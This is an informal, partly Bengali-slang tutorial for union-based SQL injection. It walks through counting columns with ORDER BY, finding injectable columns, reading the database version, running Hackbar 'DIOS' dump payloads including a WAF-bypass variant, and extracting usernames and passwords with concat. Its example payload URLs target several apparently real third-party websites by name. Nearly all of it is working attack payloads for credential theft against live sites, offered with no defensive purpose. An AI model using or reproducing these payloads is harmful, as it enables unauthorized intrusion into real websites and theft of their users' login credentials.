example:

http://math4all.in/news.php?id=6

1. add
order by 1000
and see if the server hear it.
http://math4all.in/news.php?id=6 order by 1000

2. if not add
--+ or -- -
after 1000
http://math4all.in/news.php?id=6 order by 1000--+

3. if still no error found add a cottation after value 6

like
http://math4all.in/news.php?id=6' order by 1000--+

4. if error found change 1000 to 1 and see if site is ok

then increase number from 1
its like asking the server do you have this number of column?
http://math4all.in/news.php?id=6' order by 1--+
http://math4all.in/news.php?id=6' order by 2--+
http://math4all.in/news.php?id=6' order by 3--+
http://math4all.in/news.php?id=6' order by 4--+
http://math4all.in/news.php?id=6' order by 5--+
http://math4all.in/news.php?id=6' order by 6--+
http://math4all.in/news.php?id=6' order by 7--+

5. when asking if it has 7th column and found sql error

that means it has only 6 column

6. now need to find which column is vulnarable

so add
-
before value of 6
like this
http://math4all.in/news.php?id=-6' order by 7--+
and also select all after value and go to hackbar
select union based
now select union statement
now select int,int
and give total available column number
it will now load Union Select column number
http://math4all.in/news.php?id=-6' Union Select 1,2,3,4,5,6
http://www.igoergo.com/_site/about.php?id=-4 Union Select 1,2,3,4,5,6
now search
and found 3 and 4 column is volnarable

if a box disturb in the screen that calls javascript problem.

so disable javascript if needed. from tools.

7. now check or find version info

select vulnarable column and replace with
version()
or
@@version
like
http://www.igoergo.com/_site/about.php?id=-4 Union Select 1,2,version(),4,5,6
or
http://math4all.in/news.php?id=.6' Union Select 1,@@version,3,4,5,6-- +

result is = 10.1.41-MariaDB-0+deb10u2
if version is less than 4 then its not downloadable.

7.
now dump all data
select vulnarable column
like
3 or 4 and
go to hackbar
select union based
then DIOS MYSQL
then DIOS BY ZEN
Then again DIOS BY ZEN
now execute
#why zen? zen is lightweight, it works on maximum website.

if data found then it works

if not then
go to hackbar
select union based
then DIOS MYSQL
then DIOS BY TRO@JAN WAF
then again trojan waf select korbo
link load hole execute dibo

8. when zen used find innodb data

after innobd check if there any data named like pass or user
if not found and comes illegal then use trojan waf

go to hackbar
select union based
then DIOS MYSQL
then DIOS BY TRO@JAN WAF
then again trojan waf select korbo
link load hole execute dibo

9. when zen used and innodb is found

now find pass and user data from the database
use control + f button

if trojan used
now find pass and user data from the database
use control + f button

when found note down the database table name where it is

and the full name of pass and user

10. now dump(download) the pass or user by using

concat(username,password)
and add in the end of column number, before --+ sign(if used)
from tablename
example for
http://www.igoergo.com/_site/about.php?id=-4 Union Select 1,2,3,4,5,6
where 3 and 4 column is vulnarable
type there
http://www.igoergo.com/_site/about.php?id=-4 Union Select
1,2,3,concat(username,password),5,6 from member

11. if username and password is mixed up

we need to divide it by some text or symbol
so type in the middle of username and password
== or anything
like
http://www.igoergo.com/_site/about.php?id=-4 Union Select
1,2,3,concat(username,==,password),5,6 from member

and select convert string to hex

from hackbar.
so link is
http://www.igoergo.com/_site/about.php?id=-4 Union Select
1,2,3,concat(username,0x3d3d3d,password),5,6 from member

now we found the username and password

12. if database still found error remove cottation from link

remove
'
like
http://aminter.co.th/product2.php?id=-1' Union Select
1,concat(mem_user,0x3d3d,mem_pass),3,4,5 from ck_member --+
to
http://aminter.co.th/product2.php?id=-1 Union Select
1,concat(mem_user,0x3d3d,mem_pass),3,4,5 from ck_member --+